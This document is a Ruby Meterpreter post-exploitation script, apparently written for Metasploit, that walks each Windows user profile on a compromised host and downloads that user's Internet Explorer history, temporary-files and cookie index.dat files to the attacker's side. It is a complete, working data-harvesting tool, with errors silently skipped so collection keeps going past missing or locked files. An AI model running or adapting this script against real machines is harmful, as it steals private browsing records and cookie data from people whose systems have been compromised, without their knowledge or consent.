#Rajendra Umadas (D1AB1069)
#Joseph Puran (|24|\|54(|<87)
#version 0.95

#This function will take in the path that holds the windows user folders.
#It will then enumnerate all of those folders and pull the IE history, cookies, and temporary internet dat files.
#It may seem pointless to make this a function now, however their are future revisions planned that will generalize its use.
def pullRawData(path)
	#All the pulled data will be stored in msfRoot/IE_Browser_History/[Timestamp]/
	t = Time.now
	folderPath= 'IE_Browser_History' + ::File::Separator + t.strftime("%Y_%m_%d_%H_%M_%S")
	::FileUtils.mkdir_p(folderPath)
	
	#For each item in the folder that contains user information
	client.fs.dir.foreach(path) {|user|
		#CHECK its not the . or .. ELSE look at next item
		next if user =~ /^(\.|\.\.)$/
		#CHECK that it is a directory ELSE look at next item
		next if not client.fs.file.stat(path+user).directory?
		#The below three blocks are wrapped between beging and end blocks to allow us to
		#Rescue from an expection. This is needed because if we ever try to access a file
		#or directory that doesnt exist, it will raise an exception. If we do not catch
		#this expection our entire script will die. This may leave information on the
		#machine that we could have gathered. This exception handeling also works with files
		#or directories where we do not have permissions to access. 
			
			#This block will be used to pull the history.dat file
			begin			
			history = path + user + "\\Local Settings\\History\\History.IE5\\index.dat"		
			pathPrefix = folderPath + ::File::Separator + user					
			client.fs.file.download_file(pathPrefix + "_history.dat", history)
			print_line("Extracted IE History from: " + user)
			rescue			
			end
			#This block will be used to pull the temporary internet files index.data
			begin
			tempFile = path + user + "\\Local Settings\\Temporary Internet Files\\Content.IE5\\index.dat"
			pathPrefix = folderPath + ::File::Separator + user					
			client.fs.file.download_file(pathPrefix + "_temp.dat", tempFile)
			print_line("Extracted IE Temp Info from: " + user)
			rescue			
			end
			#This block will be used to pull the cookies index.dat file
			begin
			cookies = path + user + "\\Cookies\\index.dat"
			pathPrefix = folderPath + ::File::Separator + user					
			client.fs.file.download_file(pathPrefix + "_cookies.dat", cookies)
			print_line("Extracted IE cookie info from: " + user)
			rescue
			end
			#The three index.dat files contain all the history information that we would need.
			#These files are in a binary format. They can be read by a hex editor to quickly 
			#pull out the ascii, however, a parser will be written later for this task.s
	}
	
end

#Will implement other operations systems by passing in other base directories. 
baseDir = "c:\\documents and settings\\"
pullRawData(baseDir)
#Will implement a parsing function to pull the important information out of the binary data pulled.